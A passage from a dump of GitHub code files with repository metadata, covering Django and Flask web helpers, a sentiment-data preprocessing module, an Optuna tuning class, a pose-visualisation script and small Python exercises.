path('register', user_register, name='user-register'),\n path('register/process', process_register, name='process-register'),\n path('verification', user_verification, name='user-verification'),\n path('verification/process', process_verification, name='process-verification')\n]\n","repo_name":"hendrapaiton/sidik","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30666371659","text":"from django.contrib.auth.mixins import AccessMixin\nfrom django.shortcuts import redirect\nfrom django.views.generic.base import ContextMixin\nfrom django.http import HttpResponseForbidden\nfrom management.models import Organization\n\n\nclass SessionAuthenticationRequiredMixin(AccessMixin):\n \"\"\"Verify that the current user is authenticated.\"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n if not request.session.get(\"presspass_authenticated\", False) == True:\n return redirect(\"management:login\")\n if \"org_id\" in kwargs and kwargs[\"org_id\"] not in [\n org.id for org in Organization.for_session(request.session)\n ]:\n return HttpResponseForbidden(\"403 forbidden\")\n if \"org_id\" in kwargs:\n request.organization = Organization.objects.get(pk=kwargs[\"org_id\"])\n return super().dispatch(request, *args, **kwargs)\n\n\nclass SessionOrgContextMixin(ContextMixin):\n def get_context_data(self, *args, **kwargs):\n context = super(SessionOrgContextMixin, self).get_context_data(*args, **kwargs)\n context.update(\n dict(organizations=Organization.for_session(self.request.session))\n )\n return context\n\n\nclass OrgContextMixin(ContextMixin):\n def get_context_data(self, *args, **kwargs):\n context = super(OrgContextMixin, self).get_context_data(*args, **kwargs)\n context.update(\n dict(organization=Organization.objects.get(id=self.kwargs[\"org_id\"]))\n )\n return context\n","repo_name":"news-catalyst/openalerts","sub_path":"openalerts/management/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73656701800","text":"import setuptools\nimport mimicLOB\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name= mimicLOB.__name__,\n version= mimicLOB.__version__,\n author=\"FDR\",\n author_email=\"FDR0903.DEV@gmail.com\",\n description=\"Simulation at the LOB level\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"FDR0903/mimicLOB","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"37367037826","text":"# 1. Make sure yu have a 'cache' folder\n# 2. Use only the get_train_data(ratio) or the get_test_data(ratio) function\n#\t\tafter first call, they load cached data\n#\t\tratio parameter defines the splitting ratio of the train data\n# 3. For loading the final Test data, use Get_Testing_Data() function\n#\t\tUse the Write_Predictions(predictions) to write the data\n#\t\tinto the format that Kaggle asks for\n# 4. You can delelte the content of the cache folder to start over, or\n# \t\tcall preprocess(True), so it overwrites the existing cache\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus\t\t\t\timport stopwords\nfrom bs4\t\t\t\t\t\timport BeautifulSoup\nfrom sklearn.model_selection\timport train_test_split\nimport nltk, re, cPickle, os.path, sys, gzip\n\nlabelled_data_path = \"data/labeledTrainData.tsv\"\t # For supervised learning\ntest_data_path \t = \"data/testData.tsv\"\t\t\t # For Kaggle score\nunlabelled_data_path = \"data/unlabeledTrainData.tsv\" # For Unsupervised learning\nX_Train_cache_path = \"cache/X_train_%.1f.bin\"\nY_Train_cache_path = \"cache/Y_train_%.1f.bin\"\nX_Test_cache_path = \"cache/X_test_%.1f.bin\"\nY_Test_cache_path = \"cache/Y_test_%.1f.bin\"\nTest_cache_path = \"cache/Test.bin\"\nUnlabelled_cache_path = \"cache/Unlabelled.bin\"\n\nrandom_seed_for_splitting = 42;\n\ndef get_train_data(ratio = 0.7):\t# Loads train data from cache (creates it if needed)\n\tpreprocess(ratio)\n\tX_train, Y_train = load_train_data()\n\t#print \"Preprocessing : Completed. \"\n\treturn X_train, Y_train\n\t\ndef get_test_data(ratio = 0.7):\t# Loads test data from cache (creates it if needed)\n\tpreprocess(ratio)\n\tX_test, Y_test = load_test_data()\n\t#print \"Preprocessing : Completed. \"\n\treturn X_test, Y_test\n\t\ndef Get_Testing_Data():\n\tif not os.path.isfile(Test_cache_path):\n\t\trprint(\"Loading raw test data\")\n\t\tdata = pd.read_csv(test_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\t\tpair = (clean_data(data), data['id'])\n\t\tdel data\n\t\trprint(\"Saving Test data to cache\")\n\t\tsave_zipped_pickle(pair, Test_cache_path)\n\telse:\n\t\trprint(\"Loading Test data from cache\")\n\t\tpair = load_zipped_pickle(Test_cache_path)\n\treturn pair[0], pair[1]\t# text, ids\n\t\ndef Get_Unlabelled_Data():\n\tif not os.path.isfile(Unlabelled_cache_path):\n\t\trprint(\"Loading raw unlabelled data\")\n\t\tdata = pd.read_csv(unlabelled_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\t\tclean_reviews = clean_data(data)\n\t\tdel data\n\t\trprint(\"Saving unlabelled data to cache\")\n\t\tsave_zipped_pickle(clean_reviews, Unlabelled_cache_path)\n\telse:\n\t\trprint(\"Loading unlabelled data from cache\")\n\t\tclean_reviews = load_zipped_pickle(Unlabelled_cache_path)\n\treturn clean_reviews\n\ndef Write_Predictions(path, ids, predictions):\n\toutput = pd.DataFrame( data={\"id\":ids, \"sentiment\":predictions} )\n\toutput.to_csv(path, index = False, quoting = 3)\n\t\ndef preprocess(ratio = 0.7, rebuild_cache = False):\n# Ratio*10 should be an integer, it is the ratio of train data\n# If there is no cached data for the given ratio, it creates it\n\texists = os.path.isfile(X_Train_cache_path % ratio)\t\\\n\t\t and os.path.isfile(Y_Train_cache_path % ratio)\t\\\n\t\t and os.path.isfile(X_Test_cache_path % ratio)\t\\\n\t\t and os.path.isfile(Y_Test_cache_path % ratio)\n\tif not exists or rebuild_cache:\n\t\tX_train, X_test, Y_train, Y_test = get_train_test_sets(ratio)\n\t\tsave_train_data(X_train, Y_train, ratio)\n\t\tsave_test_data(X_test, Y_test, ratio)\n\ndef rprint(str): # Next print overwrites this, eg use for indicate progress\n\tsys.stdout.write(\" Preprocessing : \" + str + \" \\r\")\n\tsys.stdout.flush()\n\ndef review_to_words(raw_review , stops): # cleans a review\n\treview_text = BeautifulSoup(raw_review, \"html.parser\").get_text().lower()\n\tletters_only = re.sub(\"[^a-z]\", \" \", review_text)\n\twords = letters_only.split()\n\tmeaningful_words = [w for w in words if not w in stops]\n\treturn( \" \".join( meaningful_words ))\n\ndef clean_data(data): \t\t\t\t# cleans raw data\n\trprint(\"Building stopwords dictionary...\")\n\tclean_reviews, reviews = [], data[\"review\"]\n\tstops = set(stopwords.words(\"english\")) # precalculating makes it faster\n\tn, i = len(reviews), 0\n\tfor rev in reviews:\n\t\t#if i % (n/200) == 0:\n\t\trprint(\"Cleaning reviews (%d %%) %d\" % (100*i/n, i))\n\t\tclean_reviews.append(review_to_words(rev, stops))\n\t\ti = i + 1\n\treturn clean_reviews\n\t\ndef get_train_test_sets(ratio = 0.7):\n\trprint(\"Loading raw train data...\")\n\tdata = pd.read_csv(labelled_data_path, header=0, delimiter=\"\\t\", quoting=3)\n\tclean_reviews = clean_data(data)\n\trprint(\"Splitting cleaned data...\")\n\tX_train, X_test, Y_train, Y_test = train_test_split(clean_reviews, np.array(data[\"sentiment\"]), \\\n\t\t\t\t\t\t\t\t\t\t\ttrain_size=ratio, random_state=random_seed_for_splitting)\n\tdel data\n\treturn X_train, X_test, Y_train, Y_test\n\t\t\n# serializes data and saves in a (somewhat) compressed format\ndef save_zipped_pickle(obj, filename, protocol=-1):\n\twith gzip.open(filename, 'wb') as f:\n\t\tcPickle.dump(obj, f, protocol)\n\t\tf.close()\n\n# loads compressed data and restores original state\ndef load_zipped_pickle(filename):\t# loads and unpacks\n\twith gzip.open(filename, 'rb') as f:\n\t\tloaded_object = cPickle.load(f)\n\t\tf.close()\n\t\treturn loaded_object\n\ndef save_train_data(X_train, Y_train, ratio = 0.7):\n\trprint(\"Saving train data to cache (1 %)\")\n\tsave_zipped_pickle(X_train, X_Train_cache_path % ratio)\n\trprint(\"Saving train data to cache (80 %)\")\n\tsave_zipped_pickle(Y_train, Y_Train_cache_path % ratio)\n\trprint(\"Saving train data to cache (100%)\")\n\ndef save_test_data(X_test, Y_test, ratio = 0.7):\n\trprint(\"Saving test data to cache (1 %)\")\n\tsave_zipped_pickle(X_test, X_Test_cache_path % ratio)\n\trprint(\"Saving test data to cache (80 %)\")\n\tsave_zipped_pickle(Y_test, Y_Test_cache_path % ratio)\n\trprint(\"Saving test data to cache (100%)\")\n\t\ndef load_train_data(ratio = 0.7):\n\trprint(\"Loading train data from cache (1 %)\")\n\tX_train = load_zipped_pickle(X_Train_cache_path % ratio)\n\trprint(\"Loading train data from cache (80 %)\")\n\tY_train = load_zipped_pickle(Y_Train_cache_path % ratio)\n\trprint(\"Loading train data from cache (100%)\")\n\treturn X_train, Y_train\n\ndef load_test_data(ratio = 0.7):\n\trprint(\"Loading test data from cache (1 %)\")\n\tX_test = load_zipped_pickle(X_Test_cache_path % ratio)\n\trprint(\"Loading test data from cache (80 %)\")\n\tY_test = load_zipped_pickle(Y_Test_cache_path % ratio)\n\trprint(\"Loading test data from cache (100%)\")\n\treturn X_test, Y_test\n\t","repo_name":"pgombar/kaggle-popcorn","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70029234279","text":"import datetime\nfrom rest_framework import serializers\nfrom django.utils.translation import gettext_lazy as _\n\nfrom voucher.models import WorkLog\nfrom voucher.utils import get_first_valid_work_log_date\n\n\ndef valid_date_worked(date):\n if date < get_first_valid_work_log_date():\n raise serializers.ValidationError(\n detail=_(\"Date %(date)s is too far in the past\")\n % {\"date\": date.isoformat()}\n )\n if date > datetime.date.today():\n raise serializers.ValidationError(\n detail=_(\"Date %(date)s is in the future\") % {\"date\": date.isoformat()}\n )\n\n\nclass ValidVouchers(object):\n serializer_field = None\n\n def __call__(self, value):\n if value > 0:\n return\n\n perm = \"%s.delete_%s\" % (WorkLog._meta.app_label, WorkLog._meta.model_name)\n if self.serializer_field.parent.context.request.user.has_perm(perm):\n return\n\n raise serializers.ValidationError(detail=_(\"Vouchers must be positive\"))\n\n def set_context(self, serializer_field):\n self.serializer_field = serializer_field\n","repo_name":"cybernetisk/internsystem","sub_path":"voucher/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"26887768845","text":"def getSec():\n \"\"\"\n get from file data for settings.py file\n return { dictionary } with conf file\n \"\"\"\n ans = []\n ansDict = {}\n fname = '../../settingsPns.txt'\n\n with open(fname) as file:\n content = file.readlines()\n\n for line_elt in content:\n ans = line_elt.split(\"===\")\n if len(ans) == 2:\n key = ans[0].strip()\n value = ans[1].strip()\n assert not(\" \" in key or \" \" in value), \"Spaces in config file!\"\n ansDict[key] = value\n else:\n assert False, \"Config file has been write in wrong format!\"\n\n return ansDict","repo_name":"dawidbo/pns","sub_path":"lib/base_func.py","file_name":"base_func.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"43046370265","text":"import optuna\nimport pandas as pd\nimport numpy as np\nfrom .metrics import map_at_k\nfrom functools import partial\n\n\nclass Optimizer:\n\n @classmethod\n def from_args(cls, params_string):\n params = {}\n funcs = {\n 'float': float,\n 'int': int,\n }\n for i in range(0, len(params_string), 2):\n k, kv = params_string[i].replace('--', '').split('__')\n v = params_string[i+1]\n if k not in params:\n params[k] = {}\n if kv not in params[k]:\n params[k][kv] = v\n\n for k in params:\n for p in params[k]:\n if p != 'type':\n params[k][p] = funcs.get(params[k]['type'], str)(params[k][p])\n\n vars_ = {}\n fixed = {}\n for pn, pv in params.items():\n if 'fixed' in pv:\n fixed[pn] = pv['fixed']\n else:\n vars_[pn] = {\n 'method': f\"suggest_{pv['type']}\",\n 'params': {\n pvk: pvv\n for pvk, pvv in pv.items()\n if pvk != 'type'\n }\n }\n\n return cls(\n fixed_params=fixed,\n trial_params={\n k: (v['method'], v['params'])\n for k, v in vars_.items()\n }\n )\n\n @property\n def best_model(self):\n _, _, rec = self.train(\n params={\n **self.fixed_params,\n **self.best_params\n }\n )\n return rec\n\n @property\n def best_params(self):\n return self.get_params(self.study.best_trial)\n\n @property\n def best_metrics(self):\n return self.detailed_objective(\n self.study.best_trial\n )\n\n def __init__(self, fixed_params, trial_params):\n self.fixed_params = fixed_params\n self.trial_params = trial_params\n\n def get_params(self, trial):\n params = {}\n for var, (method, params_) in self.trial_params.items():\n params[var] = getattr(trial, method)(var, **params_)\n return {\n **params,\n **self.fixed_params\n }\n\n def detailed_objective(self, trial):\n model_params = self.get_params(trial)\n self.trainer.update_params(model_params)\n metrics, _, (_, _) = self.trainer.train()\n return metrics\n\n def objective(self, trial):\n model_params = self.get_params(trial)\n self.trainer.update_params(model_params)\n metrics, _, (_, _) = self.trainer.train()\n return metrics['map10']\n\n def optimize(self, trials, trainer):\n self.study = optuna.create_study(direction='maximize')\n self.trainer = trainer\n\n self.study.optimize(\n self.objective,\n n_trials=trials\n )\n","repo_name":"d-emelyanov/recsys-course","sub_path":"common/common/tuning.py","file_name":"tuning.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6289145024","text":"import mmcv\nimport os.path as osp\nimport numpy as np\nimport sys\nfrom tqdm import tqdm\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.structures import BoxMode\nimport torch\n\ncur_dir = osp.dirname(osp.abspath(__file__))\nsys.path.insert(0, osp.join(cur_dir, \"../../../../\"))\n\nfrom lib.vis_utils.colormap import colormap\nfrom lib.utils.mask_utils import cocosegm2mask, get_edge\nfrom core.utils.data_utils import read_image_mmcv\nfrom core.gdrn_modeling.datasets.dataset_factory import register_datasets\nfrom transforms3d.quaternions import quat2mat\nfrom lib.egl_renderer.egl_renderer_v3 import EGLRenderer\n\nscore_thr = 0.3\ncolors = colormap(rgb=False, maximum=255)\n\nid2obj = {\n 1: \"ape\",\n # 2: 'benchvise',\n # 3: 'bowl',\n # 4: 'camera',\n 5: \"can\",\n 6: \"cat\",\n # 7: 'cup',\n 8: \"driller\",\n 9: \"duck\",\n 10: \"eggbox\",\n 11: \"glue\",\n 12: \"holepuncher\",\n # 13: 'iron',\n # 14: 'lamp',\n # 15: 'phone'\n}\nobjects = list(id2obj.values())\n\nwidth = 640\nheight = 480\ntensor_kwargs = {\"device\": torch.device(\"cuda\"), \"dtype\": torch.float32}\nimage_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()\nseg_tensor = torch.empty((height, width, 4), **tensor_kwargs).detach()\n# image_tensor = torch.empty((480, 640, 4), **tensor_kwargs).detach()\n\nmodel_dir = \"datasets/BOP_DATASETS/lmo/models/\"\n\nmodel_paths = [osp.join(model_dir, f\"obj_{obj_id:06d}.ply\") for obj_id in id2obj]\n\nren = EGLRenderer(model_paths, vertex_scale=0.001, use_cache=True, width=width, height=height)\n\n# NOTE:\npred_path = \"output/gdrn/lmo/a6_cPnP_AugAAETrunc_BG0.5_lmo_real_pbr0.1_40e/inference_model_final/lmo_test/a6-cPnP-AugAAETrunc-BG0.5-lmo-real-pbr0.1-40e-test_lmo_test_preds.pkl\"\n\nvis_dir = (\n \"output/gdrn/lmo/a6_cPnP_AugAAETrunc_BG0.5_lmo_real_pbr0.1_40e/inference_model_final/lmo_test/lmo_vis_gt_pred_full\"\n)\nmmcv.mkdir_or_exist(vis_dir)\n\nprint(pred_path)\npreds = mmcv.load(pred_path)\n\ndataset_name = \"lmo_test\"\nprint(dataset_name)\nregister_datasets([dataset_name])\n\nmeta = MetadataCatalog.get(dataset_name)\nprint(\"MetadataCatalog: \", meta)\nobjs = meta.objs\n\ndset_dicts = DatasetCatalog.get(dataset_name)\nfor d in tqdm(dset_dicts):\n K = d[\"cam\"]\n file_name = d[\"file_name\"]\n img = read_image_mmcv(file_name, format=\"BGR\")\n\n scene_im_id_split = d[\"scene_im_id\"].split(\"/\")\n scene_id = scene_im_id_split[0]\n im_id = int(scene_im_id_split[1])\n\n imH, imW = img.shape[:2]\n annos = d[\"annotations\"]\n masks = [cocosegm2mask(anno[\"segmentation\"], imH, imW) for anno in annos]\n bboxes = [anno[\"bbox\"] for anno in annos]\n bbox_modes = [anno[\"bbox_mode\"] for anno in annos]\n bboxes_xyxy = np.array(\n [BoxMode.convert(box, box_mode, BoxMode.XYXY_ABS) for box, box_mode in zip(bboxes, bbox_modes)]\n )\n quats = [anno[\"quat\"] for anno in annos]\n transes = [anno[\"trans\"] for anno in annos]\n Rs = [quat2mat(quat) for quat in quats]\n # 0-based label\n cat_ids = [anno[\"category_id\"] for anno in annos]\n\n obj_names = [objs[cat_id] for cat_id in cat_ids]\n\n est_Rs = []\n est_ts = []\n\n gt_Rs = []\n gt_ts = []\n\n labels = []\n\n for anno_i, anno in enumerate(annos):\n obj_name = obj_names[anno_i]\n\n try:\n R_est = preds[obj_name][file_name][\"R\"]\n t_est = preds[obj_name][file_name][\"t\"]\n score = preds[obj_name][file_name][\"score\"]\n except:\n continue\n if score < score_thr:\n continue\n\n labels.append(objects.index(obj_name)) # 0-based label\n\n est_Rs.append(R_est)\n est_ts.append(t_est)\n gt_Rs.append(Rs[anno_i])\n gt_ts.append(transes[anno_i])\n\n im_gray = mmcv.bgr2gray(img, keepdim=True)\n im_gray_3 = np.concatenate([im_gray, im_gray, im_gray], axis=2)\n\n gt_poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(gt_Rs, gt_ts)]\n poses = [np.hstack([_R, _t.reshape(3, 1)]) for _R, _t in zip(est_Rs, est_ts)]\n\n ren.render(labels, poses, K=K, image_tensor=image_tensor, background=im_gray_3)\n ren_bgr = (image_tensor[:, :, :3].detach().cpu().numpy() + 0.5).astype(\"uint8\")\n\n for label, gt_pose, est_pose in zip(labels, gt_poses, poses):\n ren.render([label], [gt_pose], K=K, seg_tensor=seg_tensor)\n gt_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype(\"uint8\")\n\n ren.render([label], [est_pose], K=K, seg_tensor=seg_tensor)\n est_mask = (seg_tensor[:, :, 0].detach().cpu().numpy() > 0).astype(\"uint8\")\n\n gt_edge = get_edge(gt_mask, bw=3, out_channel=1)\n est_edge = get_edge(est_mask, bw=3, out_channel=1)\n\n ren_bgr[gt_edge != 0] = np.array(mmcv.color_val(\"blue\"))\n ren_bgr[est_edge != 0] = np.array(mmcv.color_val(\"green\"))\n\n vis_im = ren_bgr\n\n save_path_0 = osp.join(vis_dir, \"{}_{:06d}_vis0.png\".format(scene_id, im_id))\n mmcv.imwrite(img, save_path_0)\n\n save_path = osp.join(vis_dir, \"{}_{:06d}_vis1.png\".format(scene_id, im_id))\n mmcv.imwrite(vis_im, save_path)\n\n # if True:\n # # grid_show([img[:, :, ::-1], vis_im[:, :, ::-1]], [\"im\", \"est\"], row=1, col=2)\n # # im_show = cv2.hconcat([img, vis_im, vis_im_add])\n # im_show = cv2.hconcat([img, vis_im])\n # cv2.imshow(\"im_est\", im_show)\n # if cv2.waitKey(0) == 27:\n # break # esc to quit\n\n# ffmpeg -r 5 -f image2 -s 1920x1080 -pattern_type glob -i \"./lmo_vis_gt_pred_full_video/*.png\" -vcodec libx264 -crf 25 -pix_fmt yuv420p lmo_vis_video.mp4\n","repo_name":"shanice-l/gdrnpp_bop2022","sub_path":"core/gdrn_modeling/tools/lmo/lmo_3_vis_poses_full.py","file_name":"lmo_3_vis_poses_full.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"18"} +{"seq_id":"22004383267","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport portfolioFile.services\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='HomePage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('landingImage', models.ImageField(null=True, upload_to=portfolioFile.services.get_main_home_upload_path)),\n ('landingImageText', models.CharField(max_length=200, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='SiteInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('image', models.ImageField(upload_to=portfolioFile.services.get_siteInfo_image_upload_path)),\n ('text', models.CharField(default=b'No Text Given', max_length=100)),\n ('homePage', models.OneToOneField(to='public.HomePage')),\n ],\n ),\n ]\n","repo_name":"amitsethi0843/wyrelist","sub_path":"public/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71392977961","text":"n = int(input(\"Type a number: \"))\n\noption = int(input(\"Type option 1-SUM or 2-MULTIPLY: \"))\n\nif option == 1:\n print(sum(range(1, n + 1)))\nif option == 2:\n product = 1\n for i in range(1, n + 1):\n product = product * i\n print(product)\n","repo_name":"Kalo7o/VUTP-Python","sub_path":"exercise_01/06.Sum_or_Product.py","file_name":"06.Sum_or_Product.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7688921594","text":"import sys\r\narr1=list(sys.stdin.readline().rstrip())\r\nm=int(sys.stdin.readline())\r\narr2=[]\r\ncursor= len(arr1)\r\nfor i in range(m):\r\n command=list(sys.stdin.readline().split())\r\n \r\n if command[0]=='P':\r\n arr1.append(command[1])\r\n elif command[0]=='L':\r\n if arr1:\r\n arr2.append(arr1.pop())\r\n elif command[0]=='D':\r\n if arr2:\r\n arr1.append(arr2.pop())\r\n else:\r\n if arr1:\r\n arr1.pop()\r\narr1.extend(reversed(arr2)) \r\nprint(''.join(arr1))","repo_name":"Hellol77/Algorithm","sub_path":"백준/Silver/1406. 에디터/에디터.py","file_name":"에디터.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2933192489","text":"import datacombine as m\nimport price as p\n\n#Function to import price data\ndef Price(y):\n price = p.ZipPrice(y)\n price = price.drop(['zipcode','year'], axis = 1)\n price = price.groupby(['boro','type']).mean().reset_index()\n return price\n\n#Create Training data files for 2013,2014\ny = [2013,2014]\n\nfor i in y:\n traindata = m.Data(i)\n trainprice = Price(i)\n traindata = traindata.merge(trainprice, on = 'boro')\n traindata.to_csv('traindata_'+str(i)+'.csv')\n\n#Create Test data file for 2015\ntestdata = m.Data(2015)\ntestdata.to_csv('testdata.csv')\n\n#Create Actual Price file for comparison\nactdata = Price(2015)\nactdata.to_csv('Actual_data.csv')\n","repo_name":"sanketpatel0512/python_class_project","sub_path":"datafile.py","file_name":"datafile.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38019642589","text":"from Append import * \nfrom Write import *\nfrom Read import *\nfrom Directory import * # these import all of the needed functions\n\nL = 0 # L for loop\nwhile L != 1 :\n print(\" A = Append\")\n print(\" D = Directory\")\n print(\" R = Read\")\n print(\" W = Write\")\n print(\" Q = quit\")\n\n Choice = input(\"what is your input\").strip().upper() #removes whitespace and capitalizes input\n if Choice == 'A':\n appendFile()\n if Choice == 'D':\n print(\"C = Create Directory\")\n print(\"D = Delete Directory\")\n print(\"X = Change Directory\")\n Choice = input().strip().upper()\n if Choice == 'C':\n CreateDirectory()\n if Choice == 'D':\n DeleteDirectory()\n if Choice == 'X':\n ChangeDirectory()\n if Choice == 'R':\n readFile()\n if Choice == 'W':\n CreateFile()\n if Choice == 'Q': #breaks loop\n L = 1 \n","repo_name":"ronnyarsenal/OS-file-operations","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9863724625","text":"# no use for now\nimport enum\n\nimport six\n\n\nclass BaseModel(object):\n pass\n\n\nclass ObjectModel(BaseModel):\n def __init__(self, data, node):\n if not isinstance(data, dict):\n raise TypeError(\"A dict expected, got a '%s' instead\" % type(data))\n self._node = node\n self._data = data\n self._name = node._path[-1]\n for k in node.properties._keys():\n if k not in data:\n continue\n v = data[k]\n m = node.properties._get(k)\n if m._is_schema:\n m = m.getModel()\n v = m(v)\n setattr(self, k, v)\n\n def __iter__(self):\n return iter(self._data)\n\n def __contains__(self, item):\n return item in self._data\n\n def __repr__(self):\n return '%s(%s)' % (\n self._name,\n ', '.join(['%s=%s' % (k, repr(v)) for k, v in six.iteritems(self.__dict__) if k in self._data])\n )\n\n\nclass ArrayModel(BaseModel, list):\n def __init__(self, data, node):\n if not isinstance(data, (list, tuple)):\n raise TypeError(\"A list or tuple expected, got a '%s' instead\" % type(data))\n self._data = data\n self._node = node\n m = node.items.getModel()\n for i in data:\n self.append(m(i))\n\n\nclass ImmutableModel(BaseModel):\n def __init__(self, data):\n self._data = data\n\n def __get__(self, instance, owner):\n if isinstance(self._data, enum.Enum):\n return self._data.value\n return self._data\n","repo_name":"Revolution1/etcd3-py","sub_path":"scripts/basemodel.py","file_name":"basemodel.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"18"} +{"seq_id":"70210801960","text":"#!/usr/bin/python3\n\n\"\"\" This module defines the Square class. \"\"\"\n\n\nclass Square:\n \"\"\"This class represents a square.\"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"\n Args:\n size (int, size): The size of the square. Defaults to 0.\n position (tuple, optional): The position of the square. Defaults to (0, 0).\n\n Raises:\n TypeError: If the size is not an integer.\n ValueError: If the size is less than 0.\n TypeError: If the position is not a tuple of 2 positive integers.\n \"\"\"\n self.__size = size\n self.position = position\n\n @property\n def size(self):\n \"\"\"Retrieves the size of the square.\"\"\"\n\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"Sets the size of the square.\"\"\"\n\n if not isinstance(value, int):\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = value\n\n @property\n def position(self):\n \"\"\"\n Retrieves the position of the square.\n\n Returns:\n tuple: The position of the square.\n\n \"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"\n Sets the position of the square.\n\n Args:\n value (tuple): The new position of the square.\n\n Raises:\n TypeError: If the position is not a tuple of 2 positive integers.\n ValueError: If the position contains negative integers.\n\n \"\"\"\n if (\n not isinstance(value, tuple)\n or len(value) != 2\n or not all(isinstance(coord, int) for coord in value)\n or not all(coord >= 0 for coord in value)\n ):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n \"\"\"\n Computes the area of the square.\n Returns:\n int: The area of the square.\n \"\"\"\n return self.__size**2\n\n def my_print(self):\n \"\"\"\n Prints the square using the character '#'.\n\n \"\"\"\n if self.__size == 0:\n print()\n else:\n for _ in range(self.__position[1]):\n print()\n for _ in range(self.__size):\n print(\" \" * self.__position[0] + \"#\" * self.__size)\n","repo_name":"unrealjo-alx/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36410546459","text":"class Solution:\n def tribonacci(self, n: int) -> int:\n ''' 同 lc 70/509 fibonacci 问题\n 这题用递归会 TLE,直接 memoize 就好\n Tn+3 = Tn + Tn+1 + Tn+2 '''\n if n == 0:\n return 0\n if n == 1:\n return 1\n nums = [0, 1, 1]\n for i in range(3, n+1):\n nums.append(nums[i-1]+nums[i-2]+nums[i-3])\n return nums[-1]\n\n '''\n method 2\n 递归 + memoize 就不会超时了\n '''\n cache = {0: 0, 1: 1, 2: 1}\n\n def memo(n):\n if n in cache:\n return cache[n]\n res = memo(n - 3) + memo(n - 2) + memo(n - 1)\n cache[n] = res\n return res\n\n return memo(n)\n","repo_name":"cicihou/LearningProject","sub_path":"leetcode-py/leetcode1137.py","file_name":"leetcode1137.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21816790737","text":"from flask import session, flash, redirect, url_for\nfrom functools import wraps # For login_required\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if ('logged_in') in session:\n # arguments and key word arguments\n return f(*args, **kwargs)\n else:\n flash(u'You need to login first.', 'danger')\n return redirect(url_for('main.login'))\n return 